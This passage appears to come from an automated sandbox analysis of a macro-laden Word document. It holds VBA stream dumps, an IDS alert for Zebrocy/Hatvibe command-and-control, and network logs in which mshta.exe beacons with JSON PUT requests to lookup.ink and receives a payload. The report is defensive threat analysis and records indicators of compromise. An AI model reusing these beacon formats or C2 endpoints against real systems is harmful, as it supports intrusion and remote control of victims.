              Data ASCII:r U . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:72 55 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 04 00 04 00 2e 00 00 00 71 0a 00 00 00 00 00 00 00 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 81 0d 00 00 00 00 00 00 00 00
              Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 420
              General
              Stream Path:VBA/__SRP_3
              CLSID:
              File Type:data
              Stream Size:420
              Entropy:2.3674153773884705
              Base64 Encoded:False
              Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . ! . . . . . . . . . . . . . . ` . . 1 . . . . . . . . . . . O . P . 1 . . . . . . . . . . . . . . ` . . 9 . . . . . 1 . . . . . . . . . . . . . . . . . O . O . 8 . . . . . . . . . . . . . . . . ` . . A . . . . . . . . . . . 8 . ! . . . . . . . . . . . . . . ` . . I . 8 . . . . . . . . . . . . . * . . . . . . . . . . . . . . . . . . . @ . . . . . . ` . . . * . . .
              Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 a8 00 00 00 08 00 40 00 21 03 00 00 00 00 00 00 00 00 02 00 00 00 04 60 04 01 31 0e ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
              Stream Path: VBA/dir, File Type: VAX-order 68K Blit (standalone) executable, Stream Size: 523
              General
              Stream Path:VBA/dir
              CLSID:
              File Type:VAX-order 68K Blit (standalone) executable
              Stream Size:523
              Entropy:6.209506507265267
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . h . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ s y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . ) . . . * . \\ C . . . . . . . \\ K . . . ] . r . . . & O . f f i c . l
              Data Raw:01 07 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 e1 f9 fc 68 06 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

              Network Behavior

              Suricata IDS Alerts

              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
              2025-01-13T21:38:36.141852+01002057742ET MALWARE TA426/Zebrocy Hatvibe CnC Server Response M11104.21.84.17480192.168.2.2649712TCP

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jan 13, 2025 21:37:32.959677935 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:37:32.964447975 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:37:32.964535952 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:37:32.964709044 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:37:32.965065956 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:37:32.969414949 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:37:32.969789028 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:37:33.623665094 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:37:33.623779058 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:37:50.850955009 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:37:50.851094961 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:37:50.855828047 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:37:50.856045961 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:37:51.108333111 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:37:51.108474016 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:38:06.470473051 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:38:06.470580101 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:38:06.475359917 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:38:06.475469112 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:38:06.742177010 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:38:06.742291927 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:38:22.568747997 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:38:22.568927050 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:38:22.580241919 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:38:22.580286026 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:38:22.861990929 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:38:22.862123966 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:38:35.781446934 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:38:35.781575918 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:38:35.789077997 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:38:35.789086103 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:38:36.116760969 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:38:36.116796970 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:38:36.116867065 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:38:36.116913080 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:38:36.136993885 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:38:36.137190104 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:38:36.141851902 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:38:36.141988039 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:38:36.332978010 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:38:36.333040953 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:38:36.482795000 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:38:36.483074903 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:39:02.161922932 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:39:02.161922932 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:39:02.166960955 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:39:02.167140961 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:39:02.467547894 CET8049712104.21.84.174192.168.2.26
              Jan 13, 2025 21:39:02.470141888 CET4971280192.168.2.26104.21.84.174
              Jan 13, 2025 21:39:05.713710070 CET6233453192.168.2.261.1.1.1
              Jan 13, 2025 21:39:05.718600988 CET53623341.1.1.1192.168.2.26
              Jan 13, 2025 21:39:05.718677044 CET6233453192.168.2.261.1.1.1
              Jan 13, 2025 21:39:05.723474979 CET53623341.1.1.1192.168.2.26
              Jan 13, 2025 21:39:06.205055952 CET6233453192.168.2.261.1.1.1
              Jan 13, 2025 21:39:06.210057974 CET53623341.1.1.1192.168.2.26
              Jan 13, 2025 21:39:06.210118055 CET6233453192.168.2.261.1.1.1

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jan 13, 2025 21:37:32.943687916 CET5405253192.168.2.261.1.1.1
              Jan 13, 2025 21:37:32.954824924 CET53540521.1.1.1192.168.2.26
              Jan 13, 2025 21:39:05.713301897 CET53597061.1.1.1192.168.2.26
              Jan 13, 2025 21:39:14.944700003 CET5970653192.168.2.261.1.1.1

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Jan 13, 2025 21:37:32.943687916 CET192.168.2.261.1.1.10x68d3Standard query (0)lookup.inkA (IP address)IN (0x0001)false
              Jan 13, 2025 21:39:14.944700003 CET192.168.2.261.1.1.10x18d0Standard query (0)browser.events.data.msn.cnA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Jan 13, 2025 21:36:54.125360012 CET1.1.1.1192.168.2.260x8762No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
              Jan 13, 2025 21:36:54.125360012 CET1.1.1.1192.168.2.260x8762No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
              Jan 13, 2025 21:37:32.954824924 CET1.1.1.1192.168.2.260x68d3No error (0)lookup.ink104.21.84.174A (IP address)IN (0x0001)false
              Jan 13, 2025 21:37:32.954824924 CET1.1.1.1192.168.2.260x68d3No error (0)lookup.ink172.67.195.112A (IP address)IN (0x0001)false
              Jan 13, 2025 21:39:14.952244043 CET1.1.1.1192.168.2.260x18d0No error (0)browser.events.data.msn.cnglobal.asimov.events.data.trafficmanager.netCNAME (Canonical name)IN (0x0001)false

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.2649712104.21.84.174805828C:\Windows\System32\mshta.exe
              TimestampBytes transferredDirectionData
              Jan 13, 2025 21:37:32.964709044 CET257OUTPUT /lookup.php HTTP/1.1
              Accept: */*
              Content-type: application/json
              User-Agent: 065367 user
              Accept-Language: en-ch
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: lookup.ink
              Content-Length: 84
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 13, 2025 21:37:32.965065956 CET84OUTData Raw: 7b 22 6f 6c 61 6d 65 72 6a 64 61 73 22 3a 22 77 38 52 32 31 49 75 38 32 53 33 42 63 56 78 79 36 38 77 71 38 36 4f 4f 22 2c 22 78 79 71 6b 77 6f 6d 63 70 73 22 3a 22 30 36 35 33 36 37 20 47 61 6e 6a 69 22 2c 22 71 70 6c 61 73 6d 76 6b 69 64 22 3a
              Data Ascii: {"olamerjdas":"w8R21Iu82S3BcVxy68wq86OO","xyqkwomcps":"065367 user","qplasmvkid":1}
              Jan 13, 2025 21:37:33.623665094 CET1000INHTTP/1.1 200 OK
              Date: Mon, 13 Jan 2025 20:37:33 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Set-Cookie: PHPSESSID=7e4lh6poe7tbuk6ln3pm7s17gv; path=/
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              cf-cache-status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dELaEhawkkuXvVPTM8JxGcEH4sBeND0ZnTTMUPQPGU3KVRV0hZ%2ByjawdvR%2FIEMNRd%2FNr%2BPStFec3JFFsR0NpcWnr%2BTjcmBdiGo9MC8v7%2FjpVl1sqa4iDPDW1egAt"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 90182f53b9eb42b8-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              server-timing: cfL4;desc="?proto=TCP&rtt=1651&min_rtt=1651&rtt_var=825&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=341&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 140
              Jan 13, 2025 21:37:50.850955009 CET303OUTPUT /lookup.php HTTP/1.1
              Accept: */*
              Content-type: application/json
              User-Agent: 065367 user
              Accept-Language: en-ch
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: lookup.ink
              Content-Length: 84
              Connection: Keep-Alive
              Cache-Control: no-cache
              Cookie: PHPSESSID=7e4lh6poe7tbuk6ln3pm7s17gv
              Jan 13, 2025 21:37:50.851094961 CET84OUTData Raw: 7b 22 6f 6c 61 6d 65 72 6a 64 61 73 22 3a 22 77 38 52 32 31 49 75 38 32 53 33 42 63 56 78 79 36 38 77 71 38 36 4f 4f 22 2c 22 78 79 71 6b 77 6f 6d 63 70 73 22 3a 22 30 36 35 33 36 37 20 47 61 6e 6a 69 22 2c 22 71 70 6c 61 73 6d 76 6b 69 64 22 3a
              Data Ascii: {"olamerjdas":"w8R21Iu82S3BcVxy68wq86OO","xyqkwomcps":"065367 user","qplasmvkid":1}
              Jan 13, 2025 21:37:51.108333111 CET943INHTTP/1.1 200 OK
              Date: Mon, 13 Jan 2025 20:37:51 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              cf-cache-status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iLG8%2BaZZkPlTwwPK8udI1X24MxSEhoSlzbheRa718DngVZSEnT7mJw36qFu3IU2qO%2FfCVEmbo0KxgctrdGhRh9U5HZlkd7Bh5s2AX1frNUXDjIgGYkcMsY8cZlLU"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 90182fc12ad842b8-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              server-timing: cfL4;desc="?proto=TCP&rtt=1645&min_rtt=1560&rtt_var=630&sent=5&recv=6&lost=0&retrans=0&sent_bytes=1000&recv_bytes=728&delivery_rate=1818181&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 140
              Jan 13, 2025 21:38:06.470473051 CET303OUTPUT /lookup.php HTTP/1.1
              Accept: */*
              Content-type: application/json
              User-Agent: 065367 user
              Accept-Language: en-ch
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: lookup.ink
              Content-Length: 84
              Connection: Keep-Alive
              Cache-Control: no-cache
              Cookie: PHPSESSID=7e4lh6poe7tbuk6ln3pm7s17gv
              Jan 13, 2025 21:38:06.470580101 CET84OUTData Raw: 7b 22 6f 6c 61 6d 65 72 6a 64 61 73 22 3a 22 77 38 52 32 31 49 75 38 32 53 33 42 63 56 78 79 36 38 77 71 38 36 4f 4f 22 2c 22 78 79 71 6b 77 6f 6d 63 70 73 22 3a 22 30 36 35 33 36 37 20 47 61 6e 6a 69 22 2c 22 71 70 6c 61 73 6d 76 6b 69 64 22 3a
              Data Ascii: {"olamerjdas":"w8R21Iu82S3BcVxy68wq86OO","xyqkwomcps":"065367 user","qplasmvkid":1}
              Jan 13, 2025 21:38:06.742177010 CET946INHTTP/1.1 200 OK
              Date: Mon, 13 Jan 2025 20:38:06 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              cf-cache-status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=no32UhmwTkGowtYlD5o9myFHopqASF7VnHYekg5hW77luZDA6pM5octRkBD%2B8j54K7KtwgsH%2Fe%2BcUvVEUrxD5cPZy3leJb2p4o7iWWNQ4pOIeJNwmfA46BpGlgrr"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 90183022cecd42b8-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              server-timing: cfL4;desc="?proto=TCP&rtt=1762&min_rtt=1560&rtt_var=707&sent=9&recv=9&lost=0&retrans=0&sent_bytes=1943&recv_bytes=1115&delivery_rate=1818181&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 140
              Jan 13, 2025 21:38:22.568747997 CET303OUTPUT /lookup.php HTTP/1.1
              Accept: */*
              Content-type: application/json
              User-Agent: 065367 user
              Accept-Language: en-ch
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: lookup.ink
              Content-Length: 84
              Connection: Keep-Alive
              Cache-Control: no-cache
              Cookie: PHPSESSID=7e4lh6poe7tbuk6ln3pm7s17gv
              Jan 13, 2025 21:38:22.568927050 CET84OUTData Raw: 7b 22 6f 6c 61 6d 65 72 6a 64 61 73 22 3a 22 77 38 52 32 31 49 75 38 32 53 33 42 63 56 78 79 36 38 77 71 38 36 4f 4f 22 2c 22 78 79 71 6b 77 6f 6d 63 70 73 22 3a 22 30 36 35 33 36 37 20 47 61 6e 6a 69 22 2c 22 71 70 6c 61 73 6d 76 6b 69 64 22 3a
              Data Ascii: {"olamerjdas":"w8R21Iu82S3BcVxy68wq86OO","xyqkwomcps":"065367 user","qplasmvkid":1}
              Jan 13, 2025 21:38:22.861990929 CET954INHTTP/1.1 200 OK
              Date: Mon, 13 Jan 2025 20:38:22 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              cf-cache-status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xP%2BrqC1GxomETRwchlVtxTP9ajYHPj3im3YiPzNHTVFX9fBnedqTxM8Nq7Ajjmv9aDkKKbE%2FXJ%2B15W2%2BCX%2BHxea4IBG%2FrcHWBOnl3q1DhGt5ykvg6H9JlUIhXJBy"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 901830876d4542b8-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              server-timing: cfL4;desc="?proto=TCP&rtt=1744&min_rtt=1552&rtt_var=567&sent=12&recv=11&lost=0&retrans=0&sent_bytes=2889&recv_bytes=1502&delivery_rate=1818181&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 140
              Jan 13, 2025 21:38:35.781446934 CET303OUTPUT /lookup.php HTTP/1.1
              Accept: */*
              Content-type: application/json
              User-Agent: 065367 user
              Accept-Language: en-ch
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: lookup.ink
              Content-Length: 84
              Connection: Keep-Alive
              Cache-Control: no-cache
              Cookie: PHPSESSID=7e4lh6poe7tbuk6ln3pm7s17gv
              Jan 13, 2025 21:38:35.781575918 CET84OUTData Raw: 7b 22 6f 6c 61 6d 65 72 6a 64 61 73 22 3a 22 77 38 52 32 31 49 75 38 32 53 33 42 63 56 78 79 36 38 77 71 38 36 4f 4f 22 2c 22 78 79 71 6b 77 6f 6d 63 70 73 22 3a 22 30 36 35 33 36 37 20 47 61 6e 6a 69 22 2c 22 71 70 6c 61 73 6d 76 6b 69 64 22 3a
              Data Ascii: {"olamerjdas":"w8R21Iu82S3BcVxy68wq86OO","xyqkwomcps":"065367 user","qplasmvkid":1}
              Jan 13, 2025 21:38:36.116760969 CET1236INHTTP/1.1 200 OK
              Date: Mon, 13 Jan 2025 20:38:36 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Vary: Accept-Encoding
              cf-cache-status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yID6umGoV795dnFI9mCy4NO8CAewK%2BZxGaRt0%2F%2FRdaVcXGHoQzGzrqCgLAj4WLMJ%2FwfssoyZfhK7ZsaG3xqhMd9suq5Q25R7b5S4fQ%2Bv0uH%2Bq95p6Cbqz41CsGHd"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 901830da283a42b8-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1552&rtt_var=455&sent=16&recv=14&lost=0&retrans=0&sent_bytes=3843&recv_bytes=1889&delivery_rate=1818181&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 33 39 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 56 8b 6e db 30 0c fc 25 ea 48 1d a5 cf 89 2d 7b 1f b0 ff 07 06 52 b6 e3 b4 dd d0 06 ab 91 a0 91 64 ea 78 3c 3e 7e 8f 3a c6 ae 9b ee bf ec d7 3e 7e db ce 0d 62 d5 e1 e0 ee 80 54 b0 ba 7a e5 60 85 d8 c6 ea cd 4d 86 3c 68 dc 79 ec 70 73 c3 46 67 75 b3 ca 95 d7 aa ab c1 7b 35 16 ba 6d 2c 69 a7 01 ae 2e 2c dc 00 74 34 15 74 6c ec 34 88 0e 08 c0 95 3b 77 2e 5e 5d 9e 67 e3 5e a3 57 6e 54 37 76 26 5e 36 85 6b ad d5 8c 5a 94 68 6c e8 71 56 fa 4f 3c 92 4e 63 71 63 b1 f0 60 a3 bb b1 4d 44 73 e5 c5 32 a7 3d 7a 5a ae 2e 06 56 3a 7b dc 18 ef 68 81 54 e3 0e f9 da 6e 0d 1f aa 0b 44 8f fb a5 7b a2 9b ef 1f ff 2f 10 53 36 47 75 34 53 5b c3 42 70 08 32 be 17 1b c9 5c 60 5b bf 44 b3 aa a1 c7 73 20 7f f5 f9 23 7b b7 bb 93 ef 40 6c 90 8f bc 7f 1d 0b 57 05 9b 3b 1a cb bc 0f 02 f9 49 14 f2 7c d8 1b 10 3e 2d 9c 6c f7 8f dc 5e 91 29 a7
              Data Ascii: 397Vn0%H-{Rdx<>~:>~bTz`M<hypsFgu{5m,i.,t4tl4;w.^]g^WnT7v&^6kZhlqVO<Ncqc`MDs2=zZ.V:{hTnD{/S6Gu4S[Bp2\`[Ds #{@lW;I|>-l^)
              Jan 13, 2025 21:38:36.116796970 CET641INData Raw: 7f 71 fe c2 31 bd b9 7e 05 9b 15 ec 74 36 b7 60 51 25 1e 00 02 42 ac 05 12 34 2b ae d4 64 fc 64 b7 60 65 c7 aa 65 72 89 35 e2 76 f3 f1 e6 c3 bf 38 73 c4 5e ae a4 ef d3 1b 3d 70 e4 09 bb ed e0 be 53 83 31 84 3f a1 a6 b0 c3 92 99 b2 b1 be a5 f7 e6
              Data Ascii: q1~t6`Q%B4+dd`eer5v8s^=pS1?R#6]O*+8c4'c-qF&D`DfdUnpefVM|x9a%M;f_0RYd04N-WocwMi-^m-h'd
              Jan 13, 2025 21:38:36.136993885 CET302OUTPUT /match.php HTTP/1.1
              Accept: */*
              Content-type: application/json
              User-Agent: 065367 user
              Accept-Language: en-ch
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: lookup.ink
              Content-Length: 69
              Connection: Keep-Alive
              Cache-Control: no-cache
              Cookie: PHPSESSID=7e4lh6poe7tbuk6ln3pm7s17gv
              Jan 13, 2025 21:38:36.137190104 CET69OUTData Raw: 7b 22 6f 6c 61 6d 65 72 6a 64 61 73 22 3a 22 77 38 52 32 31 49 75 38 32 53 33 42 63 56 78 79 36 38 77 71 38 36 4f 4f 22 2c 22 78 79 71 6b 77 6f 6d 63 70 73 22 3a 22 30 36 35 33 36 37 20 47 61 6e 6a 69 22 7d
              Data Ascii: {"olamerjdas":"w8R21Iu82S3BcVxy68wq86OO","xyqkwomcps":"065367 user"}
              Jan 13, 2025 21:38:36.332978010 CET833INHTTP/1.1 200 OK
              Date: Mon, 13 Jan 2025 20:38:36 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cP4mTVri4obVNGlU%2B7H2qfHPyLdYKG772nqqOcyqv9bXCM9XuKyPfePBSvnVCa7rxknMpwpOKLzfy%2FqRh1Sdg6Q%2BMTxpWrlycgR18clqnv0IzJON2steS8TtdrwB"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 901830dc3b8d42b8-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1552&rtt_var=455&sent=21&recv=17&lost=0&retrans=1&sent_bytes=5725&recv_bytes=2260&delivery_rate=1818181&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
              Data Ascii: 14
              Jan 13, 2025 21:38:36.482795000 CET5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0
              Jan 13, 2025 21:39:02.161922932 CET302OUTPUT /match.php HTTP/1.1
              Accept: */*
              Content-type: application/json
              User-Agent: 065367 user
              Accept-Language: en-ch
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              Host: lookup.ink
              Content-Length: 69
              Connection: Keep-Alive
              Cache-Control: no-cache
              Cookie: PHPSESSID=7e4lh6poe7tbuk6ln3pm7s17gv
              Jan 13, 2025 21:39:02.161922932 CET69OUTData Raw: 7b 22 6f 6c 61 6d 65 72 6a 64 61 73 22 3a 22 77 38 52 32 31 49 75 38 32 53 33 42 63 56 78 79 36 38 77 71 38 36 4f 4f 22 2c 22 78 79 71 6b 77 6f 6d 63 70 73 22 3a 22 30 36 35 33 36 37 20 47 61 6e 6a 69 22 7d
              Data Ascii: {"olamerjdas":"w8R21Iu82S3BcVxy68wq86OO","xyqkwomcps":"065367 user"}
              Jan 13, 2025 21:39:02.467547894 CET839INHTTP/1.1 200 OK
              Date: Mon, 13 Jan 2025 20:39:02 GMT
              Content-Type: text/html; charset=utf-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GCsUZkZNkTOpiUdWQ5IyrOuXh8%2FwDUrtISMCJkHNt1UJgVMprkI96alok1gmE4MUiKbvz9aB4lANRcDcARqUelXxfJN697zRc4bxSQs8JGZmbhP1DBt3%2BSCuuuY%2B"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 9018317eebd242b8-EWR
              Content-Encoding: gzip
              alt-svc: h3=":443"; ma=86400
              server-timing: cfL4;desc="?proto=TCP&rtt=2063&min_rtt=1552&rtt_var=1008&sent=25&recv=20&lost=0&retrans=1&sent_bytes=6563&recv_bytes=2631&delivery_rate=1818181&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 140


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:15:36:58
              Start date:13/01/2025
              Path:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
              Imagebase:0x7ff63f440000
              File size:1'637'952 bytes
              MD5 hash:A9F0EC89897AC6C878D217DFB64CA752
              Has elevated privileges:true
              Has administrator privileges:true
